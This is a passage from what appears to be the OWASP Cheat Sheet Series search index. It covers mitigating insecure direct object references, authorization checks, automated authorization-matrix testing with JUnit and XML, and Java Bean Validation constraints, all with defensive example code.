In the example above, the lookup ID was not only exposed to the user and easily tampered with, but also appears to be a fairly predictable, perhaps sequential, value. While one can use various techniques to mask or randomize these IDs and make them hard to guess, such an approach is generally not sufficient by itself. A user should not be able to access a resource they do not have permission to access simply because they are able to guess and manipulate that object's identifier in a query param or elsewhere. Rather than relying on some form of security through obscurity, the focus should be on controlling access to the underlying objects and/or the identifiers themselves. Recommended mitigations for this weakness include the following:
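One such mitigation, sketched below with hypothetical names (TransactionService, AccountRepository), is to verify that the referenced account belongs to the authenticated user before returning anything, taking the caller's identity from the session rather than from the request:

```java
import java.util.List;

/** Sketch only: AccountRepository, Transaction and AccessDeniedException are illustrative. */
public class TransactionService {

    private final AccountRepository accounts;

    public TransactionService(AccountRepository accounts) {
        this.accounts = accounts;
    }

    /**
     * The account id comes from the request (e.g. the acct_id parameter), but the
     * caller's identity comes from the authenticated session, never from the client.
     */
    public List<Transaction> listTransactions(String authenticatedUserId, long requestedAccountId) {
        if (!accounts.isOwnedBy(requestedAccountId, authenticatedUserId)) {
            // Fail closed: an unknown account and someone else's account look identical.
            throw new AccessDeniedException("Access denied");
        }
        return accounts.findTransactions(requestedAccountId);
    }

    public interface AccountRepository {
        boolean isOwnedBy(long accountId, String userId);
        List<Transaction> findTransactions(long accountId);
    }

    public record Transaction(long id, String description) { }

    public static class AccessDeniedException extends RuntimeException {
        public AccessDeniedException(String message) { super(message); }
    }
}
```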

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#enforce-authorization-checks-on-static-resources","title":"Enforce Authorization Checks on Static Resources","text":"

The importance of securing static resources is often overlooked or at least overshadowed by other security concerns. Although securing databases and similar data stores often justly receive significant attention from security conscious teams, static resources must also be appropriately secured. Although unprotected static resources are certainly a problem for websites and web applications of all forms, in recent years, poorly secured resources in cloud storage offerings (such as Amazon S3 Buckets) have risen to prominence. When securing static resources, consider the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#verify-that-authorization-checks-are-performed-in-the-right-location","title":"Verify that Authorization Checks are Performed in the Right Location","text":"

Developers must never rely on client-side access control checks. While such checks may be permissible for improving the user experience, they should never be the decisive factor in granting or denying access to a resource; client-side logic is often easy to bypass. Access control checks must be performed server-side, at the gateway, or using a serverless function (see OWASP ASVS 4.0.3, V1.4.1 and V4.1.1).

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#exit-safely-when-authorization-checks-fail","title":"Exit Safely when Authorization Checks Fail","text":"

Failed access control checks are a normal occurrence in a secured application; consequently, developers must plan for such failures and handle them securely. Improper handling of such failures can lead to the application being left in an unpredictable state (CWE-280: Improper Handling of Insufficient Permissions or Privileges). Specific recommendations include the following:
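As a small illustration of failing closed (all names are hypothetical), the failure path below denies access, logs the event, and never falls through into the privileged code:

```java
import java.util.logging.Logger;

/** Sketch of handling a failed access control check safely; names are illustrative. */
public class ReportEndpoint {

    private static final Logger LOG = Logger.getLogger(ReportEndpoint.class.getName());

    /** Hypothetical decision point. */
    public interface PermissionChecker {
        boolean canRead(String userId, String reportId);
    }

    private final PermissionChecker checker;

    public ReportEndpoint(PermissionChecker checker) {
        this.checker = checker;
    }

    public String viewReport(String userId, String reportId) {
        if (!checker.canRead(userId, reportId)) {
            // Log enough detail for investigation, return nothing sensitive to the
            // caller, and never continue into the privileged code path.
            LOG.warning(() -> "Denied READ on report " + reportId + " for user " + userId);
            return "Access denied";
        }
        return loadReport(reportId);
    }

    private String loadReport(String reportId) {
        return "report contents for " + reportId; // placeholder for real data access
    }
}
```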

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#implement-appropriate-logging","title":"Implement Appropriate Logging","text":"

Logging is one of the most important detective controls in application security; insufficient logging and monitoring is recognized as among the most critical security risks in OWASP's Top Ten 2021. Appropriate logs can not only detect malicious activity, but are also invaluable resources in post-incident investigations, can be used to troubleshoot access control and other security-related problems, and are useful in security auditing. Though easy to overlook during the initial design and requirements phase, logging is an important component of holistic application security and must be incorporated into all phases of the SDLC. Recommendations for logging include the following:

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#create-unit-and-integration-test-cases-for-authorization-logic","title":"Create Unit and Integration Test Cases for Authorization Logic","text":"

Unit and integration testing are essential for verifying that an application performs as expected and consistently across changes. Flaws in access control logic can be subtle, particularly when requirements are complex; however, even a small logical or configuration error in access control can result in severe consequences. Although not a substitute for a dedicated security test or penetration test (see OWASP WSTG 4.5 for an excellent guide on this topic as it relates to access control), automated unit and integration testing of access control logic can help reduce the number of security flaws that make it into production. These tests are good at catching the \"low-hanging fruit\" of security issues, but not more sophisticated attack vectors (OWASP SAMM: Security Testing).

Unit and integration testing should aim to incorporate many of the concepts explored in this document. For example, is access being denied by default? Does the application terminate safely when an access control check fails, even under abnormal conditions? Are ABAC policies being properly enforced? While simple unit and integration tests can never replace manual testing performed by a skilled hacker, they are an important tool for detecting and correcting security issues quickly and with far fewer resources than manual testing.

"},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#abac","title":"ABAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#least-privilege","title":"Least Privilege","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rbac","title":"RBAC","text":""},{"location":"cheatsheets/Authorization_Cheat_Sheet.html#rebac","title":"ReBAC","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html","title":"Authorization Testing Automation Cheat Sheet","text":""},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Defining and implementing authorizations is one of the important protection measures of an application. Authorizations are defined during the design phase of the project, and even if authorization issues are found when the application is initially released and submitted to a security audit before going live, the largest number of authorization issues appears during the maintenance lifetime of the application.

This situation is often explained by the fact that features are added or modified without any review of the authorizations before the new release is published, for cost or time reasons.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#context","title":"Context","text":"

In order to address this situation, it can be useful to automate the evaluation of the authorization definition and implementation in the application, so as to constantly ensure that the implementation of the authorizations is consistent with their definition.

An authorization is often composed of two elements (also named dimensions): the Feature, and the Logical Role that can access it. Sometimes a third dimension named Data is added, in order to define access that includes filtering at the business-data level.

The representation of the different combinations of these two dimensions is often called an authorization matrix and is often formalized in a spreadsheet.

During a test of an authorization, a Logical Role is also called a Point Of View.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#objective","title":"Objective","text":"

This article describes a proposed implementation for automating the tests of an authorization matrix.

The technical proposal described here assumes that two dimensions are used to represent an authorization, and takes an application exposing REST services as an example.

The objective is to provide starting ideas and hints for creating a tailored way of testing the authorization matrix of the target application.

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#proposition","title":"Proposition","text":"

In order to achieve the full automation of the evaluation of the authorization matrix, the following actions have been performed:

  1. Formalize the authorization matrix in a pivot-format file that allows:

    1. Easy processing by a program.
    2. Reading and updating by a human, to follow up on the authorization combinations.
    3. A hierarchy in the information, in order to easily materialize the different combinations.
    4. Maximum independence from the technology and design used to implement the application exposing the features.
  2. Create a set of integration tests that fully use the authorization matrix pivot file as their input source in order to evaluate the different combinations, with:

    1. Minimal maintenance when the authorization matrix pivot file is updated.
    2. A clear indication, in case of a failed test, of the authorization combination that does not respect the authorization matrix.
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#authorization-matrix-pivot-file","title":"Authorization matrix pivot file","text":"

The XML format has been used to formalize the authorization matrix.

The XML structure contains 3 main sections:

This is an example of the XML used to represent the authorization:

Placeholders (values between {}) are used to mark locations where a test value must be inserted by the integration tests if needed.

  <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n      This file materializes the authorization matrix for the different\n      services exposed by the system.\n\n      It will be used by the tests as a input source for the different tests cases:\n      1) Evaluate legitimate access and its correct implementation\n      2) Identify not legitimate access (authorization definition issue\n      on service implementation)\n\n      The \"name\" attribute is used to uniquely identify a SERVICE or a ROLE.\n  -->\n<authorization-matrix>\n\n<!-- Describe the possible logical roles used in the system, is used here to\n      provide a list+explanation\n      of the different roles (authorization level) -->\n<roles>\n<role name=\"ANONYMOUS\"\ndescription=\"Indicate that no authorization is needed\"/>\n<role name=\"BASIC\"\ndescription=\"Role affecting a standard user (lowest access right just above anonymous)\"/>\n<role name=\"ADMIN\"\ndescription=\"Role affecting an administrator user (highest access right)\"/>\n</roles>\n\n<!-- List and describe the available services exposed by the system and the associated\n      logical role(s) that can call them -->\n<services>\n<service name=\"ReadSingleMessage\" uri=\"/{messageId}\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"ReadAllMessages\" uri=\"/\" http-method=\"GET\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ANONYMOUS\"/>\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"CreateMessage\" uri=\"/\" http-method=\"PUT\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"BASIC\"/>\n<role name=\"ADMIN\"/>\n</service>\n<service name=\"DeleteMessage\" uri=\"/{messageId}\" http-method=\"DELETE\"\nhttp-response-code-for-access-allowed=\"200\" http-response-code-for-access-denied=\"403\">\n<role name=\"ADMIN\"/>\n</service>\n</services>\n\n<!-- Provide a test payload for each service if needed -->\n<services-testing>\n<service name=\"ReadSingleMessage\">\n<payload/>\n</service>\n<service name=\"ReadAllMessages\">\n<payload/>\n</service>\n<service name=\"CreateMessage\">\n<payload content-type=\"application/json\">\n{\"content\":\"test\"}\n              </payload>\n</service>\n<service name=\"DeleteMessage\">\n<payload/>\n</service>\n</services-testing>\n\n</authorization-matrix>\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#integration-tests","title":"Integration tests","text":"

The integration tests are implemented with as much factorized code as possible, and one test case per Point Of View (POV) is created in order to group the verifications by access-level profile (logical role) and to make errors easier to identify.

Parsing, object mapping and access to the authorization matrix information are implemented using the XML marshalling/unmarshalling features built into the technology used to implement the tests (JAXB here), so that the code is limited to what is needed to perform the tests.

This is the implementation of the integration tests case class:

  import org.owasp.pocauthztesting.enumeration.SecurityRole;\nimport org.owasp.pocauthztesting.service.AuthService;\nimport org.owasp.pocauthztesting.vo.AuthorizationMatrix;\nimport org.apache.http.client.methods.CloseableHttpResponse;\nimport org.apache.http.client.methods.HttpDelete;\nimport org.apache.http.client.methods.HttpGet;\nimport org.apache.http.client.methods.HttpPut;\nimport org.apache.http.client.methods.HttpRequestBase;\nimport org.apache.http.entity.StringEntity;\nimport org.apache.http.impl.client.CloseableHttpClient;\nimport org.apache.http.impl.client.HttpClients;\nimport org.junit.Assert;\nimport org.junit.BeforeClass;\nimport org.junit.Test;\nimport org.xml.sax.InputSource;\nimport javax.xml.bind.JAXBContext;\nimport javax.xml.parsers.SAXParserFactory;\nimport javax.xml.transform.Source;\nimport javax.xml.transform.sax.SAXSource;\nimport java.io.File;\nimport java.io.FileInputStream;\nimport java.util.ArrayList;\nimport java.util.List;\nimport java.util.Optional;\n\n/**\n   * Integration Test cases in charge of validate the correct implementation of the authorization matrix.\n   * Create on test case by logical role that will test access on all services exposed by the system.\n   * Implements here focus on readability\n   */\npublic class AuthorizationMatrixIT {\n\n/**\n       * Object representation of the authorization matrix\n       */\nprivate static AuthorizationMatrix AUTHZ_MATRIX;\n\nprivate static final String BASE_URL = \"http://localhost:8080\";\n\n\n/**\n       * Load the authorization matrix in objects tree\n       *\n       * @throws Exception If any error occurs\n       */\n@BeforeClass\npublic static void globalInit() throws Exception {\ntry (FileInputStream fis = new FileInputStream(new File(\"authorization-matrix.xml\"))) {\nSAXParserFactory spf = SAXParserFactory.newInstance();\nspf.setFeature(\"http://xml.org/sax/features/external-general-entities\", false);\nspf.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false);\nspf.setFeature(\"http://apache.org/xml/features/nonvalidating/load-external-dtd\", false);\nSource xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(fis));\nJAXBContext jc = JAXBContext.newInstance(AuthorizationMatrix.class);\nAUTHZ_MATRIX = (AuthorizationMatrix) jc.createUnmarshaller().unmarshal(xmlSource);\n}\n}\n\n/**\n       * Test access to the services from a anonymous user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingAnonymousUserPointOfView() throws Exception {\n//Run the tests - No access token here\nList<String> errors = executeTestWithPointOfView(SecurityRole.ANONYMOUS, null);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ANONYMOUS USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a basic user.\n       *\n       * @throws Exception\n       */\n@Test\npublic void testAccessUsingBasicUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"basic\", SecurityRole.BASIC);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.BASIC, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the BASIC USER point of view:\\n \" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Test access to the services from a administrator user.\n       *\n   
    * @throws Exception\n       */\n@Test\npublic void testAccessUsingAdministratorUserPointOfView() throws Exception {\n//Get access token representing the authorization for the associated point of view\nString accessToken = generateTestCaseAccessToken(\"admin\", SecurityRole.ADMIN);\n//Run the tests\nList<String> errors = executeTestWithPointOfView(SecurityRole.ADMIN, accessToken);\n//Verify the test results\nAssert.assertEquals(\"Access issues detected using the ADMIN USER point of view:\\n\" + formatErrorsList(errors), 0, errors.size());\n}\n\n/**\n       * Evaluate the access to all service using the point of view (POV) specified.\n       *\n       * @param pointOfView Point of view to use\n       * @param accessToken Access token that is linked to the point of view in terms of authorization.\n       * @return List of errors detected\n       * @throws Exception If any error occurs\n       */\nprivate List<String> executeTestWithPointOfView(SecurityRole pointOfView, String accessToken) throws Exception {\nList<String> errors = new ArrayList<>();\nString errorMessageTplForUnexpectedReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one in allowed or denied case.\";\nString errorMessageTplForIncorrectReturnCode = \"The service '%s' when called with POV '%s' return a response code %s that is not the expected one (%s expected).\";\nString fatalErrorMessageTpl = \"The service '%s' when called with POV %s meet the error: %s\";\n\n//Get the list of services to call\nList<AuthorizationMatrix.Services.Service> services = AUTHZ_MATRIX.getServices().getService();\n\n//Get the list of services test payload to use\nList<AuthorizationMatrix.ServicesTesting.Service> servicesTestPayload = AUTHZ_MATRIX.getServicesTesting().getService();\n\n//Call all services sequentially (no special focus on performance here)\nservices.forEach(service -> {\n//Get the service test payload for the current service\nString payload = null;\nString payloadContentType = null;\nOptional<AuthorizationMatrix.ServicesTesting.Service> serviceTesting = servicesTestPayload.stream().filter(srvPld -> srvPld.getName().equals(service.getName())).findFirst();\nif (serviceTesting.isPresent()) {\npayload = serviceTesting.get().getPayload().getValue();\npayloadContentType = serviceTesting.get().getPayload().getContentType();\n}\n//Call the service and verify if the response is consistent\ntry {\n//Call the service\nint serviceResponseCode = callService(service.getUri(), payload, payloadContentType, service.getHttpMethod(), accessToken);\n//Check if the role represented by the specified point of view is defined for the current service\nOptional<AuthorizationMatrix.Services.Service.Role> role = service.getRole().stream().filter(r -> r.getName().equals(pointOfView.name())).findFirst();\nboolean accessIsGrantedInAuthorizationMatrix = role.isPresent();\n//Verify behavior consistency according to the response code returned and the authorization configured in the matrix\nif (serviceResponseCode == service.getHttpResponseCodeForAccessAllowed()) {\n//Roles is not in the list of role allowed to access to the service so it's an error\nif (!accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessDenied()));\n}\n} else if (serviceResponseCode == service.getHttpResponseCodeForAccessDenied()) {\n//Roles is in the list of role allowed to access to the 
service so it's an error\nif (accessIsGrantedInAuthorizationMatrix) {\nerrors.add(String.format(errorMessageTplForIncorrectReturnCode, service.getName(), pointOfView.name(), serviceResponseCode,\nservice.getHttpResponseCodeForAccessAllowed()));\n}\n} else {\nerrors.add(String.format(errorMessageTplForUnexpectedReturnCode, service.getName(), pointOfView.name(), serviceResponseCode));\n}\n} catch (Exception e) {\nerrors.add(String.format(fatalErrorMessageTpl, service.getName(), pointOfView.name(), e.getMessage()));\n}\n\n\n});\n\nreturn errors;\n}\n\n/**\n       * Call a service with a specific payload and return the HTTP response code received.\n       * Delegate this step in order to made the test cases more easy to maintain.\n       *\n       * @param uri                URI of the target service\n       * @param payloadContentType Content type of the payload to send\n       * @param payload            Payload to send\n       * @param httpMethod         HTTP method to use\n       * @param accessToken        Access token to specify to represent the identity of the caller\n       * @return The HTTP response code received\n       * @throws Exception If any error occurs\n       */\nprivate int callService(String uri, String payload, String payloadContentType, String httpMethod, String accessToken) throws Exception {\nint rc;\n\n//Build the request - Use Apache HTTP Client in order to be more flexible in the combination\nHttpRequestBase request;\nString url = (BASE_URL + uri).replaceAll(\"\\\\{messageId\\\\}\", \"1\");\nswitch (httpMethod) {\ncase \"GET\":\nrequest = new HttpGet(url);\nbreak;\ncase \"DELETE\":\nrequest = new HttpDelete(url);\nbreak;\ncase \"PUT\":\nrequest = new HttpPut(url);\nif (payload != null) {\nrequest.setHeader(\"Content-Type\", payloadContentType);\n((HttpPut) request).setEntity(new StringEntity(payload.trim()));\n}\nbreak;\ndefault:\nthrow new UnsupportedOperationException(httpMethod + \" not supported !\");\n}\nrequest.setHeader(\"Authorization\", (accessToken != null) ? accessToken : \"\");\n\n\n//Send the request and get the HTTP response code\ntry (CloseableHttpClient httpClient = HttpClients.createDefault()) {\ntry (CloseableHttpResponse httpResponse = httpClient.execute(request)) {\n//Don't care here about the response content...\nrc = httpResponse.getStatusLine().getStatusCode();\n}\n}\n\nreturn rc;\n}\n\n/**\n       * Generate a JWT token the user and role specified.\n       *\n       * @param login User login\n       * @param role  Authorization logical role\n       * @return The JWT token\n       * @throws Exception If any error occurs during the creation\n       */\nprivate String generateTestCaseAccessToken(String login, SecurityRole role) throws Exception {\nreturn new AuthService().issueAccessToken(login, role);\n}\n\n\n/**\n       * Format a list of errors to a printable string\n       *\n       * @param errors Error list\n       * @return Printable string\n       */\nprivate String formatErrorsList(List<String> errors) {\nStringBuilder buffer = new StringBuilder();\nerrors.forEach(e -> buffer.append(e).append(\"\\n\"));\nreturn buffer.toString();\n}\n}\n

If one or more authorization issues are detected, the output is the following:

testAccessUsingAnonymousUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 1.009 s  ### FAILURE\njava.lang.AssertionError:\nAccess issues detected using the ANONYMOUS USER point of view:\nThe service 'DeleteMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\nThe service 'CreateMessage' when called with POV 'ANONYMOUS' return\na response code 200 that is not the expected one (403 expected).\n\ntestAccessUsingBasicUserPointOfView(org.owasp.pocauthztesting.AuthorizationMatrixIT)\nTime elapsed: 0.05 s  ### FAILURE!\njava.lang.AssertionError:\nAccess issues detected using the BASIC USER point of view:\nThe service 'DeleteMessage' when called with POV 'BASIC' return\na response code 200 that is not the expected one (403 expected).\n
"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#rendering-of-the-authorization-matrix-for-an-audit-review","title":"Rendering of the authorization matrix for an audit / review","text":"

Even if the authorization matrix is stored in a human-readable format (XML), it can be useful to provide an on-the-fly rendering of the XML file in order to facilitate review, audit and discussion of the authorization matrix and to spot potential inconsistencies.

The following XSL stylesheet can be used:

<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n<xsl:template match=\"/\">\n<html>\n<head>\n<title>Authorization Matrix</title>\n<link rel=\"stylesheet\"\nhref=\"https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css\"\nintegrity=\"sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ\"\ncrossorigin=\"anonymous\" />\n</head>\n<body>\n<h3>Roles</h3>\n<ul>\n<xsl:for-each select=\"authorization-matrix/roles/role\">\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<strong>\n<xsl:value-of select=\"@name\" />\n</strong>\n:\n                  <xsl:value-of select=\"@description\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</xsl:for-each>\n</ul>\n<h3>Authorizations</h3>\n<table class=\"table table-hover table-sm\">\n<thead class=\"thead-inverse\">\n<tr>\n<th>Service</th>\n<th>URI</th>\n<th>Method</th>\n<th>Role</th>\n</tr>\n</thead>\n<tbody>\n<xsl:for-each select=\"authorization-matrix/services/service\">\n<xsl:variable name=\"service-name\" select=\"@name\" />\n<xsl:variable name=\"service-uri\" select=\"@uri\" />\n<xsl:variable name=\"service-method\" select=\"@http-method\" />\n<xsl:for-each select=\"role\">\n<tr>\n<td scope=\"row\">\n<xsl:value-of select=\"$service-name\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-uri\" />\n</td>\n<td>\n<xsl:value-of select=\"$service-method\" />\n</td>\n<td>\n<xsl:variable name=\"service-role-name\" select=\"@name\" />\n<xsl:choose>\n<xsl:when test=\"@name = 'ADMIN'\">\n<div class=\"alert alert-warning\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:when test=\"@name = 'BASIC'\">\n<div class=\"alert alert-info\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:when>\n<xsl:otherwise>\n<div class=\"alert alert-danger\" role=\"alert\">\n<xsl:value-of select=\"@name\" />\n</div>\n</xsl:otherwise>\n</xsl:choose>\n</td>\n</tr>\n</xsl:for-each>\n</xsl:for-each>\n</tbody>\n</table>\n</body>\n</html>\n</xsl:template>\n</xsl:stylesheet>\n

Example of the rendering:

"},{"location":"cheatsheets/Authorization_Testing_Automation_Cheat_Sheet.html#sources-of-the-prototype","title":"Sources of the prototype","text":"

GitHub repository

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html","title":"Bean Validation Cheat Sheet","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for using Java Bean Validation security functionality in your applications.

Bean Validation (JSR 303, a.k.a. Bean Validation 1.0, and JSR 349, a.k.a. Bean Validation 1.1) is one of the most common ways to perform input validation in Java. It is an application-layer-agnostic validation spec which provides the developer with the means to define a set of validation constraints on a domain model and then validate those constraints throughout the various application tiers.

One advantage of this approach is that the validation constraints and the corresponding validators are only written once, thus reducing duplication of effort and ensuring uniformity:

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#typical-validation","title":"Typical Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#bean-validation","title":"Bean Validation","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#setup","title":"Setup","text":"

The examples in this guide use Hibernate Validator (the reference implementation for Bean Validation 1.1).

Add Hibernate Validator to your pom.xml:

<dependency>\n<groupId>org.hibernate</groupId>\n<artifactId>hibernate-validator</artifactId>\n<version>5.2.4.Final</version>\n</dependency>\n

Enable bean validation support in Spring's context.xml:

<beans:beans ...\n...\n<mvc:annotation-driven />\n...\n</beans:beans>\n

For more info, please see the setup guide

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#basics","title":"Basics","text":"

In order to get started using Bean Validation, you must add validation constraints (@Pattern, @Digits, @Min, @Max, @Size, @Past, @Future, @CreditCardNumber, @Email, @URL, etc.) to your model and then utilize the @Valid annotation when passing your model around in various application layers.

Constraints can be applied in several places:

For Bean Validation 1.1 also on:

For the sake of simplicity all the examples below feature field constraints and all validation is triggered by the controller. Refer to the Bean Validation documentation for a full list of examples.
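Field constraints are what the examples below use; as a contrast, here is a minimal sketch (the class name is illustrative) of the method parameter and return value constraints supported since Bean Validation 1.1, which are enforced by an executable validator or by a container such as Spring or CDI when the method is called:

```java
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;

public class ArticleService {

    // Constraints placed directly on a method parameter and on the return value.
    @NotNull
    public String summarize(@NotNull @Size(min = 10, max = 500) String articleBody) {
        return articleBody.substring(0, Math.min(articleBody.length(), 10));
    }
}
```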

When it comes to error handling, Spring MVC exposes the validation outcome through a BindingResult object which contains a List<ObjectError>. The examples below feature simplistic error handling, while a production-ready application would have a more elaborate design that takes care of logging and error page redirection.

"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#predefined-constraints","title":"Predefined Constraints","text":""},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#pattern","title":"@Pattern","text":"

Annotation:

@Pattern(regexp=, flags=)

Data Type:

CharSequence

Use:

Checks if the annotated string matches the regular expression regexp, considering the given flags. Please visit the OWASP Validation Regex Repository for other useful regexes.

Reference:

Documentation

Model:

import javax.validation.constraints.Pattern;\n\npublic class Article {\n//Constraint: Alphanumeric article titles only, using a regular expression\n@Pattern(regexp = \"[a-zA-Z0-9 ]+\")\nprivate String articleTitle;\n\npublic String getArticleTitle() {\nreturn articleTitle;\n}\n\npublic void setArticleTitle(String articleTitle) {\nthis.articleTitle = articleTitle;\n}\n\n...\n\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Article;\n\n@Controller\npublic class ArticleController  {\n\n...\n\n@RequestMapping(value = \"/postArticle\",  method = RequestMethod.POST)\npublic @ResponseBody String postArticle(@Valid  Article  article,  BindingResult  result,\nHttpServletResponse  response) {\nif (result.hasErrors()) {\nString errorMessage  =  \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor(ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \" +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#digits","title":"@Digits","text":"

Annotation:

@Digits(integer=,fraction=)

Data Type:

BigDecimal, BigInteger, CharSequence, byte, short, int, long and the respective wrappers of the primitive types; Additionally supported by HV: any sub-type of Number

Use:

Checks whether the annotated value is a number having up to integer digits and fraction fractional digits

Reference:

Documentation

Model:

import javax.validation.constraints.Digits;\n\npublic class Customer {\n//Constraint: Age can only be 3 digits long or less\n@Digits(integer = 3, fraction = 0)\nprivate int age;\n\npublic int getAge() {\nreturn age;\n}\n\npublic void setAge(int age) {\nthis.age = age;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Customer;\n\n@Controller\npublic class CustomerController  {\n\n...\n\n@RequestMapping(value = \"/registerCustomer\",  method = RequestMethod.POST)\npublic @ResponseBody String registerCustomer(@Valid Customer customer, BindingResult result,\nHttpServletResponse  response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\n\nfor( ObjectError  e :  errors) {\nerrorMessage += \"ERROR: \"  +  e.getDefaultMessage();\n}\nreturn  errorMessage;\n} else {\nreturn  \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#size","title":"@Size","text":"

Annotation:

@Size(min=, max=)

Data Type:

CharSequence, Collection, Map and Arrays

Use:

Checks if the annotated element's size is between min and max (inclusive)

Reference:

Documentation

Model:

import javax.validation.constraints.Size;\n\npublic class Message {\n\n//Constraint: Message must be at least 10 characters long, but less than 500\n@Size(min = 10, max = 500)\nprivate String message;\n\npublic String getMessage() {\nreturn message;\n}\n\npublic void setMessage(String message) {\nthis.message = message;\n}\n\n...\n}\n

Controller:

import javax.validation.Valid;\nimport com.company.app.model.Message;\n\n@Controller\npublic class MessageController {\n\n...\n\n@RequestMapping(value = \"/sendMessage\", method = RequestMethod.POST)\npublic @ResponseBody String sendMessage(@Valid Message message, BindingResult result,\nHttpServletResponse response) {\n\nif (result.hasErrors()) {\nString errorMessage = \"\";\nresponse.setStatus(HttpServletResponse.SC_BAD_REQUEST);\nList<ObjectError> errors = result.getAllErrors();\nfor (ObjectError e : errors) {\nerrorMessage += \"ERROR: \" + e.getDefaultMessage();\n}\nreturn errorMessage;\n} else {\nreturn \"Validation Successful\";\n}\n}\n}\n
"},{"location":"cheatsheets/Bean_Validation_Cheat_Sheet.html#past-future","title":"@Past / @Future","text":"

Annotation:

@Past, @Future

Data Type:

java.util.Date, java.util.Calendar, java.time.chrono.ChronoZonedDateTime, java.time.Instant, java.time.OffsetDateTime

Use:

Checks whether the annotated date is in the past / future

Reference:

Documentation

Model:

